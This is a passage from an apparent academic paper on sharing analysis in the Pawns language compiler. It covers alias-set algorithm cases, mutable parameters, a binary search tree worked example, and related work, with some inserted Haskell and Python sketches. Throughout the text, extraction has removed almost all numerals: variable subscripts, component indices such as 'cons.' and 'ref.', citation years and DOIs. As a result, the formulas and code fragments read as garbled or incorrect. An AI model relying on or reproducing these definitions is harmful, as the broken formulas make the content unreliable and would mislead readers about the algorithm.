and returns v.c′ where c′ is the correctly folded component for the type of variable v. for example, fc (ts.[cons. ]) = ts.[], assuming ts has type rtrees. as well as containing pairs of components for distinct variables which may alias, the abstract domain contains “self-alias” pairs for each possible component of a variable which may exist. consider the following two bindings and the corresponding diagram (as with cons, no tag is used for rnode): with our domain, the most precise description of sharing after these two bindings is as follows. we represent an alias pair as a set of two variable components. the first five are self-alias pairs and the other two describe the sharing between t and ts. {{t.[rnode. ], t.[rnode. ]}, {t.[rnode. ], t.[rnode. ]}, {ts.[], ts.[]}, {ts.[cons. ], ts.[cons. ]}, {ts.[cons. ,rnode. ], ts.[cons. ,rnode. ]}, {t.[rnode. ], ts.[cons. ,rnode. ]}, {t.[rnode. ], ts.[]}} note there is no self-alias pair for t.[] since there is no strict sub-part of t that is an rtree. similarly, there is no alias between ts.[cons. ] and any part of t. although the value t is used as the first argument of cons in ts, this is not a main memory word that is used to represent the value of t (indeed, the value of t has no cons cells). 
the tagged pointer value stored in variable t (which may be in a register) is copied into the cons cell. such descriptions of sharing are an abstraction of computation states. the set above abstracts all computation states in which t is a tree with a single node, ts is a list of trees, elements of ts may be t or have t as a subtree, and there are no other live variables with non-atomic values. the sharing analysis algorithm we now describe the sharing analysis algorithm. overall, the compiler attempts to find a proof that for a computation with a depth d of (possibly recursive) function calls, the following condition c holds, assuming c holds for all computations of depth less than d. this allows a proof by induction that c holds for all computations that terminate normally. c: for all functions f , if the precondition of f is satisfied (abstracts the computation state) whenever f is called, then naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . for all function calls and assignment statements in f , any live variable that may be updated at that point in an execution of f is annotated with “!”, . there is no update of live “abstract” variables when executing f , . all parameters of f which may be updated when executing f are declared mutable in the type signature of f , . the union of the pre- and post-conditions of f abstracts the state when f returns plus the values of mutable parameters in all states during the execution of f , . for all function calls and assignment statements in f , any live variable that may be directly updated at that point is updated with a value of the same type or a more general type, and . for all function calls and assignment statements in f , any live variable that may be indirectly updated at that point only shares with variables of the same type or a more general type. the algorithm is applied to each function definition in core pawns to compute an approximation to the sharing before and after each statement (we call it the alias set). this can be used to check points , , and above. the algorithm checks that preconditions are satisfied for each function call, allowing the induction hypothesis to be used. point is established using point and a simple syntactic check that any parameter of f that is annotated “!” in the definition is declared mutable in the type signature (parameters are considered live throughout the definition). point relies on and the type checking pass. the core of the algorithm is to compute the alias set after a statement, given the alias set before the statement. this is applied recursively for compound statements in a form of abstract execution. note that for point , if a statement changes the set of memory cells used to represent a mutable parameter, the algorithm computes the sharing for the union of the two sets of cells. we do not prove correctness of the algorithm but hope our presentation is sufficiently detailed to have uncovered any bugs. a proof would have a separate case for each kind of statement in the core language, showing that if the initial alias set abstracts the execution state before the statement the resulting alias set abstracts the execution state after the statement. this would require a more formal description of execution states and their relationship with the core language and the abstract domain. the abstract domain relies on type information so the sharing analysis relies on type preservation in the execution. 
type preservation also relies on sharing analysis. thus, a completely formal approach must tackle both problems together. although our approach is not formal, we do state the key condition c, which has points relating to both sharing and types, and we include instype in the core language. the alias set used at the start of a definition is the precondition of the function. this implicitly includes self-alias pairs for all variable components of the arguments of the function and the pseudo-variables abstractt for each type t used. similarly, the postcondition implicitly includes self-alias pairs for all components of the result (and the abstractt variable if the result is abstract). as abstract execution proceeds, extra self-aliasing for arguments and results is usually desired. for the rare cases it is not, we may provide a mechanism to override this default in the future. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. variables from the function body are added to the alias set and variables that are no longer live can be removed to improve efficiency. for each program point, the computed alias set abstracts the computation state at that point in all concrete executions of the function that satisfy the precondition. for mutable parameters of the function, the sharing computed also includes the sharing from previous program points. the reason for this special treatment is explained when we discuss the analysis of function application. the alias set computed for the end of the definition, with sharing for local variables removed, must be a subset of the union of the pre- and post-condition of the function. before sharing analysis, a type checking/inference pass is completed which assigns a type to each variable and function application. this determines the components for each variable. polymorphism is also eliminated as follows. suppose we have a function take n xs, which returns the list containing the first n elements of xs: take :: int -> [a] -> [a] sharing take n xs = ys pre nosharing post ys = xs for each call to take, the pre- and post-conditions are determined based on the type of the application. an application to lists of booleans will have two components for each variable whereas an application to lists of lists of booleans will have four. when analysing the definition of take we instantiate type variables such as a above to ref (). this type has a single component which can be shared to represent possible sharing of arbitrary components of an arbitrary type. type checking prevents sharing between non-identical types, such as [a] and [b]. finally, we assume there is no type which is an infinite chain of refs, for example, type refs = ref refs (for which type folding results in an empty component rather than a [ref. ] component; this is not a practical limitation). suppose a is the alias set just before statement s. the following algorithm computes alias(s,a ), the alias set just after statement s. the algorithm structure follows the recursive definition of statements and we describe it using pseudo-haskell, interspersed with discussion. the empty list is written [], non-empty lists are written [a,b,c] or a:b:c:[] and ++ denotes list concatenation. at some points we use high level declarative set comprehensions to describe what is computed and naive implementation may not lead to the best performance. 
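to make the representation concrete, the alias-set domain and the eqvar case above could be modelled with ordinary haskell sets roughly as follows (an executable sketch of our own; names such as aliasEqVar and the string encoding of components are assumptions, not part of the pawns compiler):

import qualified Data.Set as S

type Var  = String
type Comp = [String]                 -- a (folded) component, e.g. ["Cons.1", "RNode.1"]
type VC   = (Var, Comp)              -- a variable component v.c
type Pair = (VC, VC)                 -- an alias pair {a,b}, kept in canonical order
type AliasSet = S.Set Pair

mkPair :: VC -> VC -> Pair
mkPair a b = if a <= b then (a, b) else (b, a)

-- the eqvar case (v1 = v2): duplicate v2's (self-)aliasing for v1 and
-- make v1 share with every component that v2 shares with
aliasEqVar :: Var -> Var -> AliasSet -> AliasSet
aliasEqVar v1 v2 a0 = S.unions [a0, self, share]
  where
    self  = S.fromList [ mkPair (v1, c) (v1, c')
                       | ((w, c), (w', c')) <- S.toList a0, w == v2, w' == v2 ]
    share = S.fromList [ mkPair (v1, c) other
                       | (x, y) <- S.toList a0
                       , ((w, c), other) <- [(x, y), (y, x)]
                       , w == v2 ]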
alias (seq stat stat ) a = -- stat ; stat alias stat (alias stat a ) alias (eqvar v v ) a = -- v = v let self = {{v .c ,v .c }|{v .c ,v .c } ∈ a } share = {{v .c ,v.c }|{v .c ,v.c } ∈ a } in a ∪ self ∪ share naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alias (derefeq v v ) a = -- *v = v let self = {{v .[ref. ],v .[ref. ]}} ∪ {{fc(v .(ref. :c )),fc(v .(ref. :c ))}|{v .c ,v .c } ∈ a } share = {{fc(v .(ref. :c )),v.c }|{v .c ,v.c } ∈ a } in a ∪ self ∪ share sequencing is handled by function composition. to bind a fresh variable v to a variable v , the self-aliasing of v (including aliasing between different components of v ) is duplicated for v and the aliasing for each component of v (which includes self-aliasing) is duplicated for v . binding *v to v is done in a similar way, but the components of v must have ref. prepended to them and the result folded, and the [ref. ] component of v self-aliases. folding is only needed for the rare case of types with recursion through ref. alias (assign v v ) a = -- *v := v let -- al = possible aliases for v .[ref. ] al = {va.ca | {v .[ref. ],va.ca} ∈ a } -- (live variables in al, which includes v , must be -- annotated with ! and must not share with abstract) self al = {{fc(va.(ca++c )), fc(vb.(cb++c ))}| va.ca ∈ al ∧ vb.cb ∈ al ∧ {v .c ,v .c } ∈ a } share al = {{fc(va.(ca++c )),v.c } | va.ca ∈ al ∧ {v .c ,v.c } ∈ a } in if v is a mutable parameter then a ∪ self al ∪ share al else let -- old = old aliases for v , which can be removed old = {{v .(ref. :d:c ),v.c } | {v .(ref. :d:c ),v.c } ∈ a } in (a \ old ) ∪ self al ∪ share al assignment to an existing variable differs from binding a fresh variable in three ways. first, self-sharing for v .[ref. ] is not added since it already exists. second, v .[ref. ] may alias several variable components (the live subset of these variables must be annotated with “!” on the assignment statement; checking such annotations is a primary purpose of the analysis). all these variables end up sharing with v and what v shares with (via share al) plus themselves and each other (via self al). the components must be concatenated and folded appropriately. third, if v is not a mutable parameter the existing sharing with a path strictly longer than [ref. ] (that is, paths of the form ref. :d : c ) can safely be removed, improving precision. the component v .[ref. ] represents the single memory word that is overwritten and whatever the old contents shared with is no longer needed to describe the sharing for v . for mutable parameters the old value may share with variables from the calling context and we retain this information, as explained naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. later. consider the example below, where t and ts are as before and local variables v and v are references to the element of ts. the value assigned, v , is rnode (cons (rnode nil) nil). there is aliasing of v .[ref. ], v .[ref. ] and ts.[cons. ] so all these variables have the sharing of v and self-sharing added. generally we must also add sharing between all pairs of these variables. for example, {ts.[cons. ], v .[ref. ,rnode. ,cons. ]} must be added because the cons component of v did not previously exist. the old sharing of v with t is discarded. note that we cannot discard the old sharing of ts and v with t for two reasons. 
first, no definite aliasing information is maintained, so we cannot be sure v or ts are modified at all. second, the assignment updates only one memory word whereas there may be other words also represented by ts.[cons. ]. in some cases, the old sharing of v is discarded and immediately added again. consider the following example, which creates a cyclic list. the sharing between v and v is discarded but added again (via share al) because v also shares with v . correctness of the algorithm when cyclic terms are created depends on the abstract domain we use. a more expressive domain could distinguish between different cons cells in a list. for example, if types are “folded” at the third level of recursion rather than the first, the domain can distinguish three classes of cons cells, where the distance from the first cons cell, modulo three, is zero, one or two. for a cyclic list with a single cons cell, that cons cell must be in all three classes and our algorithm would need modification to achieve this. however, in our domain types are folded at the first level of recursion so we have a unique folded path for each memory cell in cyclic data structure (cyclic terms can only be created with recursive types). there is no distinction between the first and second cons cell in a list, for example. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alias (dc v dc [v ,... vn]) a = -- v = dc v ...vn let self = {{fc(v.[dc.i]), fc(v.[dc.i])} | ≤ i ≤ n} ∪ {{fc(v.(dc.i:c )),fc(v.(dc.j:c ))} | {vi.c ,vj.c } ∈ a } share = {{fc(v.(dc.i:c )),w.c } | {vi.c ,w.c } ∈ a } in a ∪ self ∪ share the derefeq case can be seen as equivalent to v = ref v and binding a variable to a data constructor with n variable arguments is a generalisation. if there are multiple vi that share, the corresponding components of v must also share; these pairs are included in self . alias (eqderef v v ) a = -- v = *v let self = {{v .c ,v .c } | {fc(v .(ref. :c )),fc(v .(ref. :c ))} ∈ a } share = {{v .c ,v.c } | {fc(v .(ref. :c )),v.c } ∈ a empty = {{v .[],v.c} | {v .[],v.c} ∈ (self ∪ share ) in if the type of v has a [] component then a ∪ self ∪ share else --- avoid bogus sharing with empty component (a ∪ self ∪ share )\ empty the eqderef case is similar to the inverse of derefeq in that we are removing ref. rather than prepending it (the definition implicitly uses the inverse of fc). however, if the empty component results we must check that such a component exists for the type of v . alias (app v f [v ,... vn]) a = -- v = f v ...vn let "f(w , ... wk+ n) = r" is used to declare sharing for f mut = the arguments that are declared mutable post = the postcondition of f along with the sharing for mutable arguments from the precondition, with parameters and result renamed with f.[cl.k],... f.[cl. ],v ,... vn and v, respectively -- (the renamed precondition of f must be a subset of a , -- and mutable arguments of f and live variables they share -- with must be annotated with ! 
and must not share with -- abstract) -- selfc+sharec needed for possible closure creation selfc = {{v.[cl.i],v.[cl.i] | ≤ i ≤ n} ∪ {{v.((cl.(n + − i)):c ),v.((cl.(n+ -j)):c )} | {vi.c ,vj.c } ∈ a } ∪ {{v.((cl.(i + n)):c ),v.((cl.(j + n)):c )} | {f.((cl.i):c ),f.((cl.j):c )} ∈ a } sharec = {{v.((cl.(n + − i)):c ),x.c } | {vi.c ,x.c )} ∈ a } ∪ {{v.((cl.(i + n)):c ),x.c | {f.((cl.i):c ),x.c } ∈ a } -- postt+postm needed for possible function call postt = {{x .c ,x .c } | {x .c ,x .c } ∈ post ∧{x .c ,x .c } ∈ a } naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. postm = {{x .c ,x .c } | {x .c ,vi.c } ∈ a } ∧ {x .c ,vj.c } ∈ a ∧ {vi.c ,vj.c } ∈ post ∧vi ∈ mut ∧ vj ∈ mut} in a ∪ selfc ∪ sharec ∪ postt ∪ postm for many app occurrences, the function is known statically and we can determine if the function is actually called or a closure is created instead. however, in general we must assume either could happen and add sharing for both. if a closure is created, the first n closure arguments share with the n arguments of the function call and any closure arguments of f share with additional closure arguments of the result (this requires renumbering of these arguments). analysis of function calls relies on the sharing and mutability information attached to all arrow types. because pawns uses the syntax of statements to express pre- and post-conditions, our implementation uses the sharing analysis algorithm to derive an explicit alias set representation (currently this is done recursively, with the level of recursion limited by the fact than pre- and post-conditions must not contain function calls). here we ignore the details of how the alias set representation is obtained. the compiler also uses the sharing information immediately before an application to check that the precondition is satisfied, all required “!” annotations are present and abstract variables are not modified. given that the precondition is satisfied, the execution of a function results in sharing of parameters that is a subset of the union of the declared pre- and post-conditions (we assume the induction hypothesis holds for the sub-computation, which has a smaller depth of recursion). however, any sharing between non-mutable arguments that exists immediately after the call must exist before the call. the analysis algorithm does not add sharing between non-mutable arguments in the precondition as doing so would unnecessarily restrict how “high level” and “low level” code can be mixed. it is important we can pass a variable to a function that allows an abstract argument without the analysis concluding the variable subsequently shares with abstract, and therefore cannot be updated. thus post is just the declared postcondition plus the subset of the precondition which involves mutable parameters of the function, renamed appropriately. the last n formal parameters, wk+ ...wk+n are renamed as the arguments of the call, v ...vn and the formal result r is renamed v. the formal parameters w ...wk represent closure arguments k ... of f. thus a variable component such as w .[cons. ] is renamed f.[cl.k,cons. ]. it is also necessary to include one step of transitivity in the sharing information: if variable components x .c and x .c alias in post and x .c and x .c (may) alias before the function call, we add an alias of x .c and x .c (in postt). 
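to make the transitivity step concrete, here is a minimal sketch in python, separate from the pawns implementation itself, of a literal reading of postt as just described; the alias-pair representation, the helper name post_transitivity and the tiny example data are invented here purely for illustration.

from itertools import product

# an alias pair is a frozenset of one or two (variable, component) items
# (a singleton is a self-alias); an alias set is a set of such pairs.
def post_transitivity(post, a):
    # one step of transitivity, read literally from the description above:
    # if x1.c1 and x2.c2 alias in post, and x2.c2 and x3.c3 may alias in the
    # current alias set a, then x1.c1 and x3.c3 may alias after the call.
    extra = set()
    for p, q in product(post, a):
        for x1c1, x2c2 in product(p, p):      # both orderings of the post pair
            if x2c2 in q:
                for x3c3 in q:
                    extra.add(frozenset((x1c1, x3c3)))
    return extra

# hypothetical example: the renamed post-condition says the result v shares
# with argument v1; before the call v1 may share with x, so after the call
# v may share with x as well (the component strings are just labels here).
post = {frozenset({("v", "[ref]"), ("v1", "[ref]")})}
a = {frozenset({("v1", "[ref]"), ("x", "[ref]")}),
     frozenset({("v1", "[ref]")}),            # self-aliases
     frozenset({("x", "[ref]")})}
print(frozenset({("v", "[ref]"), ("x", "[ref]")}) in post_transitivity(post, a))  # True

the renaming of formal parameters and closure arguments that precedes this step in the actual analysis is omitted from the sketch.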
function parameters are proxies for the argument variables as well as any variable components they may alias and when functions are analysed these aliases are not known. this is why the transitivity step is needed, and why mutable parameters also require special treatment. if before the call, x .c and x .c may alias with mutable parameter components vi.c and vj.c , respectively, and the two mutable parameter components alias in post then x .c and x .c may alias naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. after the call; this is added in postm. consider the example below, where we have a pair v (of references to references to integers) and variables x and y share with the two elements of v , respectively. when v is passed to function f as a mutable parameter, sharing between x and y is introduced. the sharing of the mutable parameter in the postcondition, {v .[pair. ,ref. ,ref. ],v .[pair. ,ref. ,ref. ]}, results in sharing between x and y being added in the analysis. f :: pair (ref (ref int)) -> () sharing f !v = _ pre nosharing post *a = *b; v = pair a b f !v = case v of (pair rr rr ) -> *rr := *rr !v the need to be conservative with the sharing of mutable parameters in the analysis of function definitions (the special treatment in assign) is illustrated by the example below. consider the initial state, with variables v and v which share with x and y, respectively. after f is called x and y share, even though the parameters v and v do not share at any point in the execution of f . if mutable parameters were not treated specially in the assign case, nosharing would be accepted as the postcondition of f and the analysis of the call to f would then be incorrect. the sharing is introduced between memory cells that were once shared with v and others that were once shared with v . thus in our algorithm, the sharing of mutable parameters reflects all memory cells that are reachable from the parameters during the execution of the function. where the mutable parameters are assigned in f , the sharing of the parameters’ previous values (rr and rr ) is retained. thus when the final assignment is processed, sharing between the parameters is added and this must be included in the postcondition. although this assignment does not modify v or v , the “!” annotations are necessary and alert the reader to potential modification of variables that shared with the parameters when the function was called. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. f :: ref (ref (ref int)) -> ref (ref (ref int)) -> () sharing f !v !v = _ pre nosharing post **v = **v f !v !v = *r = -- ref to new cell containing *rr = r -- ref to above ref *r = -- ref to new cell containing *rr = r -- ref to above ref rr = *v -- save *v rr = *v -- save *v *!v := rr -- update *v with ref (ref ) *!v := rr -- update *v with ref (ref ) *rr := *rr !v !v -- can create sharing at call alias error a = ∅ -- error alias (case v [(p ,s ),...(pn,sn)]) a = -- case v of ... let old = {{v.c ,v .c | {v.c ,v .c } ∈ a } in  ≤ i≤ n aliascase a old v pi si aliascase a av v (pat dc [v ,... vn]) s = -- (dc *v ...*vn) -> s let avdc = {{fc(v.(dc.i:c )),w.c } | {fc(v.(dc.i:c )),w.c } ∈ av} rself = {{vi.[ref. ],vi.[ref. ]} | ≤ i ≤ n} vishare = {{fc(vi.(ref. :c )),fc(vj.(ref. :c ))} | {fc(v.(dc.i:c )),fc(v.(dc.j:c ))} ∈ av} share = {{fc(vi.(ref. 
:c )),w.c } | {fc(v.(dc.i:c )),w.c ))} ∈ av} in alias s (rself ∪ vishare ∪ share∪(a \ av)∪ avdc) for a case expression we return the union of the alias sets obtained for each of the different branches. for each branch, we only keep sharing information for the variable we are switching on that is compatible with the data constructor in that branch (we remove all the old sharing, av, and add the compatible sharing, avdc). we implicitly use the inverse of fc. to deal with individual data constructors, we consider pairs of components of arguments i and j which may alias in order to compute possible sharing between vi and vj, including self-aliases when i = j. the corresponding component of vi (prepended with ref and folded) may alias the component of vj. for example, if v of type rtrees is matched with cons *v *v and v.[] self-aliases, we need to find the components which fold to v.[] (v.[cons. ] and v.[cons. ,rnode. ]) in order to compute the sharing for v and v . thus we compute that v .[ref. ], may alias v .[ref. ,rnode. ]. this can occur if the data structure is cyclic, such as the example below where v is a list containing a single tree with in the node and v as the children (hence it represents a single infinite branch). note that v .[ref. ,rnode. ] represents both the memory cell containing the cons pointer and the cell containing nil. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alias (instype v v ) a = -- v = v ::t alias (eqvar v v ) a -- (if any sharing is introduced between v and v , -- v must not be indirectly updated later while live) type instantiation is dealt with in the same way as variable equality, with the additional check that if any sharing is introduced, the variable with the more general type is not implicitly updated later while still live (it is sufficient to check there is no “!v ” annotation attached to a later statement). example we now show how this sharing analysis algorithm is applied to the binary search tree code given earlier. we give a core pawns version of each function and the alias set before and after each statement, plus an additional set at the end which is the union of the pre- and post-conditions of the function. to save space, we write the alias set as a set of sets where each inner set represents all sets containing exactly two of its members. thus {{a,b,c}} represents a set of six alias pairs: aliasing between all pairs of elements, including self-aliases. the return value is given by variable ret and variables absl and abst are the versions of abstract for type ints and tree, respectively. list_bst xs = -- v = tnil -- *tp = v -- list_bst_du xs !tp -- ret = *tp -- we start with the precondition: a = {{xs.[cons. ], absl.[cons. ]}, {xs.[], absl.[]}}. binding to a constant introduces no sharing so a = a . a = a ∪{tp.[ref. ]}. the function call has precondition a ∪ {{tp.[ref. ]},{tp.[ref. ,node. ]}}, which is a superset of a . since tp is a mutable argument the precondition sharing for tp is added: a = a ∪ {{tp.[ref. ,node. ]}}. the final sharing includes the return variable, ret: a = a ∪ {{ret.[],tp.[ref. ]}, {ret.[node. ],tp.[ref. ,node. ]}}. after removing sharing for the dead (local) variable tp we obtain a subset of the union of the pre- and post-conditions, which is a ∪ {{ret.[],abst.[]},{ret.[node. ], abst.[node. ]}}. list_bst_du xs !tp = -- case xs of (cons *v *v ) -> -- naish ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. x = *v -- xs = *v -- v = bst_insert_du x !tp -- v = list_bst_du xs !tp -- ret = v -- nil -> -- ret = () -- -- after case -- we start with the precondition, a = {{tp.[ref. ]}, {tp.[ref. ,node. ]}, {xs.[cons. ],absl.[cons. ]},{xs.[],absl.[]}}. the cons branch of the case introduces sharing for v and v : a = a ∪{{xs.[cons. ], absl.[cons. ], v .[ref. ], v .[ref. ,cons. ]},{v .[ref. ],xs.[], absl.[]}}. the list elements are atomic so a = a . the next binding makes the sharing of xs and xs the same: a = a ∪{{v .[ref. ],xs.[], xs .[], absl.[]}, {v .[ref. ],xs.[cons. ], xs .[cons. ], absl.[cons. ], v .[ref. ,cons. ]}}. this can be simplified by removing the dead variables v and v . the precondition of the calls are satisfied and a = a = a = a . for the nil branch, we remove the incompatible sharing for xs from a : a = {{tp.[ref. ]}, {tp.[ref. ,node. ]}, {absl.[cons. ]}, {absl.[]}} and a = a . finally, a = a ∪ a . this contains all the sharing for mutable parameter tp and, ignoring local variables, is a subset of the union of the pre- and post-conditions, a . bst_insert_du x !tp = -- v = *tp -- case v of tnil -> -- v = tnil -- v = tnil -- v = node v x v -- *!tp := v -- ret = () -- (node *lp *v *rp) -> -- n = *v -- v = (x <= n) -- case v of true -> -- v = (bst_insert_du x !lp) !tp -- ret = v -- false -> -- v = (bst_insert_du x !rp) !tp -- ret = v -- -- end case -- -- end case -- naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. here a = {{tp.[ref. ]}, {tp.[ref. ,node. ]}} and a = a ∪ {{v .[], tp.[ref. ]}, {tp.[ref. ,node. ], v .[node. ]}}. for the tnil branch we remove the v sharing so a = a = a = a and a = a ∪ {{v .[]}, {v .[node. ]}}. after the destructive update, a = a ∪ {{v .[], tp.[ref. ]}, {v .[node. ], tp.[ref. ,node. ]}} (v is dead and can be removed) and a = a . for the node branch we have a = a ∪ {{v .[], tp.[ref. ], lp.[ref. ], rp.[ref. ]}, {tp.[ref. ,node. ], lp.[ref. ,node. ], rp.[ref. ,node. ], v .[ref. ], v .[node. ]}}. the same set is retained for a ...a (assuming the dead variable v is retained), the preconditions of the function calls are satisfied and the required annotations are present. finally, a = a ∪ a , which contains all the sharing for tp, and after eliminating local variables we get the postcondition, which is the same as the precondition. discussion imprecision in the analysis of mutable parameters could potentially be reduced by allowing the user to declare that only certain parts of a data structure are mutable, as suggested in naish ( ). it is inevitable we lose some precision with recursion in types, but it seems that some loss of precision could be avoided relatively easily. the use of the empty path to represent sub-components of recursive types results in imprecision when references are created. for example, the analysis of *vp = nil; v = *vp concludes that the empty component of v may alias with itself and the ref component of vp (in reality, v has no sharing). instead of the empty path, a dummy path of length one could be used. flagging data structures which are known to be acyclic could also improve precision for case. a more aggressive approach would be to unfold the recursion an extra level, at least for some types. 
this could allow us to express (non-)sharing of separate subtrees and whether data structures are cyclic, at the cost of more variable components, more complex pre- and post-conditions and more complex analysis for assign and case. increasing the number of variable components also decreases efficiency. the algorithmic complexity is affected by the representation of alias sets. currently we use a naive implementation, using just ordered pairs of variable components as the set elements and a set library which uses an ordered binary tree. the size of the set can be o(n²), where n is the maximum number of live variable components of the same type at any program point (each such variable component can alias with all the others). in typical code, the number of live variables at any point is not particularly large. if the size of alias sets does become problematic, a more refined set representation could be used, such as the set of sets of pairs representation we used in 'example,' where sets of components that all alias with each other are optimised. there are also simpler opportunities for efficiency gains, such as avoiding sharing analysis for entirely pure code. we have not stress tested our implementation or run substantial benchmarks as it is intended to be a prototype, but performance has been encouraging. translating the tree insertion code plus a test harness to c, which includes the sharing analysis, takes less time than compiling the resulting c code using gcc. total compilation time is less than half that of ghc for equivalent haskell code and less than one tenth that of mlton for equivalent ml code. the pawns executable is around – times as fast as the others. related work related programming languages are discussed in naish ( ); here we restrict attention to work related to the sharing analysis algorithm. the most closely related work is that done in the compiler for mars (giuca, ), which extends similar work done for mercury (mazur et al., ) and earlier for prolog (mulkers, ). all use a similar abstract domain based on the type folding method first proposed in bruynooghe ( ). our abstract domain is somewhat more precise due to inclusion of self-aliasing, and we have no sharing for constants. in mars it is assumed that constants other than numbers can share. thus, for code such as xs = []; ys = xs our analysis concludes there is no sharing between xs and ys whereas the mars analysis concludes there may be sharing. one important distinction is that in pawns sharing (and mutability) is declared in type signatures of functions so the pawns compiler just has to check the declarations are consistent, rather than infer all sharing from the code. however, it does have the added complication of destructive update. as well as having to deal with the assignment primitive, it complicates handling of function calls and case statements (the latter due to the potential for cyclic structures). mars, mercury and prolog are essentially declarative languages. although mars has assignment statements the semantics is that values are copied rather than destructively updated—the variable being assigned is modified but other variables remain unchanged. sharing analysis is used in these languages to make the implementation more efficient.
for example, the mars compiler can often emit code to destructively update rather than copy a data structure because sharing analysis reveals no other live variables share it. in mercury and prolog, the analysis can reveal when heap-allocated data is no longer used, so the code can reuse or reclaim it directly instead of invoking a garbage collector. these sharing inference systems use an explicit graph representation of the sharing behaviour of each segment of code. for example, code s may cause aliasing between (a component of ) variables a and b (which is represented as an edge between nodes a and b) and between c and d and code s may cause aliasing between b and c and between d and e. to compute the sharing for the sequence s ;s they use the “alternating closure” of the sharing for s and s , which constructs paths with edges alternating from s and s , for example a-b (from s ), b-c (from s ), c-d (from s ) and d-e (from s ). the sharing behaviour of functions in pawns is represented explicitly, by a pre- and post-condition and set of mutable arguments but there is no explicit representation for sharing of statements. the (curried) function alias s represents the sharing behaviour of s and the sharing behaviour of a sequence of statements is represented by the composition of functions. this representation has the advantage that the function can easily use information about the current sharing, including self-aliases, and remove some if appropriate. for example, in the [] branch of the case in the code below the sharing for xs is removed and we can conclude the returned value does not share with the argument. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. map_const_ :: [t] -> [int] sharing map_const_ xs = ys pre nosharing post nosharing map_const_ xs = case xs of [] -> xs -- can look like result shares with xs (_:xs ) -> :(map_const_ xs ) there is also substantial work on sharing analysis for logic programming languages using other abstract domains, notably the set-sharing domain of jacobs & langen ( ) (a set of sets of variables), generally with various enhancements—see bagnara, zaffanella & hill ( ) for a good summary and evaluation. applications include avoiding the “occurs check” in unification (søndergaard, ) and exploiting parallelism of independent sub-computations (bueno, garćıa de la banda & hermenegildo, ). these approaches are aimed at identifying sharing of logic variables rather than sharing of data structures. for example, although the two prolog goals p(x) and q(x) share x, they are considered independent if x is instantiated to a data structure that is ground (contains no logic variables). ground data structures in prolog are read-only and cause no problem for parallelism or the occurs check, whether they are shared or not. the set-sharing domain is often augmented with extra information related to freeness (free means uninstantiated), linearity (linear means there are no repeated occurrences of any variable) and/or groundness (bagnara, zaffanella & hill, ). in pawns there are no logic variables but data structures are mutable, hence their sharing is important. however, the set-sharing domain (with enhancements) has been adapted to analysis of sharing of data structures in object oriented languages such as java (méndez-lojo & hermenegildo, ). 
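as an aside, the 'alternating closure' construction described earlier in this section can be made concrete with a small python sketch; this is only an illustrative reading of the idea (edges are undirected here and a path may begin in either graph), not the exact definition used in the cited analyses, and all names are ours.

from collections import deque

def alternating_closure(s1, s2):
    # pairs of nodes joined by a path whose edges alternate between the two
    # sharing graphs s1 and s2; edges are 2-element (or singleton) frozensets.
    def neighbours(n, edges):
        return {next(iter(e - {n})) if len(e) > 1 else n for e in edges if n in e}
    nodes = {n for e in s1 | s2 for n in e}
    result = set(s1) | set(s2)
    for start in nodes:
        # state: (current node, index of the edge set to use for the next step)
        frontier = deque([(start, 0), (start, 1)])
        seen = set(frontier)
        while frontier:
            node, k = frontier.popleft()
            for nxt in neighbours(node, (s1, s2)[k]):
                result.add(frozenset({start, nxt}))
                state = (nxt, 1 - k)
                if state not in seen:
                    seen.add(state)
                    frontier.append(state)
    return result

# the example from the text: a-b and c-d come from s1, b-c and d-e from s2;
# the alternating path a-b-c-d-e makes a and e share in the composition.
s1 = {frozenset({"a", "b"}), frozenset({"c", "d"})}
s2 = {frozenset({"b", "c"}), frozenset({"d", "e"})}
print(frozenset({"a", "e"}) in alternating_closure(s1, s2))  # True

by contrast, representing the sharing behaviour of a statement as a function and composing those functions, as pawns does, lets the analysis consult the current alias set (including self-aliases) directly, which is the point made above.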
one important distinction is that pawns directly supports algebraic data types which allow a “sum of products”: there can be a choice of several data constructors (a sum), where each one consists of several values as arguments (a product). in java and most other imperative and object oriented languages, additional coding is generally required to support such data types. products are supported by objects containing several values but the only choice (sum) supported directly is whether the object is null or not. java objects and pointers in most imperative languages are similar to a maybe algebraic data type, with nothing corresponding to null. a ref cannot be null. the abstract domain of méndez-lojo & hermenegildo ( ) uses set-sharing plus additional information about what objects are definitely not null. for pawns code that uses refs this information is given by the data type—the more expressive types allow us to trivially infer some information that is obscured in other languages. for code that uses maybe, our domain can express the fact that a variable is definitely nothing by not having a self-alias of the just component. the rich structural information in our domain fits particularly well with algebraic data types. there are also other approaches to and uses of alias analysis for imperative languages, such as landi & ryder ( ) and emami, ghiya & hendren ( ), but these are not aimed at precisely capturing information about dynamically allocated data. a more detailed discussion of such approaches is given in giuca ( ). naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. conclusion purely declarative languages have the advantage of avoiding side effects, such as destructive update of function arguments. this makes it easier to combine program components, but some algorithms are hard to code efficiently without flexible use of destructive update. a function can behave in a purely declarative way if destructive update is allowed, but restricted to data structures that are created inside the function. the pawns language uses this idea to support flexible destructive update encapsulated in a declarative interface. it is designed to make all side effects “obvious” from the source code. because there can be sharing between the representations of different arguments of a function, local variables and the value returned, sharing analysis is an essential component of the compiler. it is also used to ensure “preservation” of types in 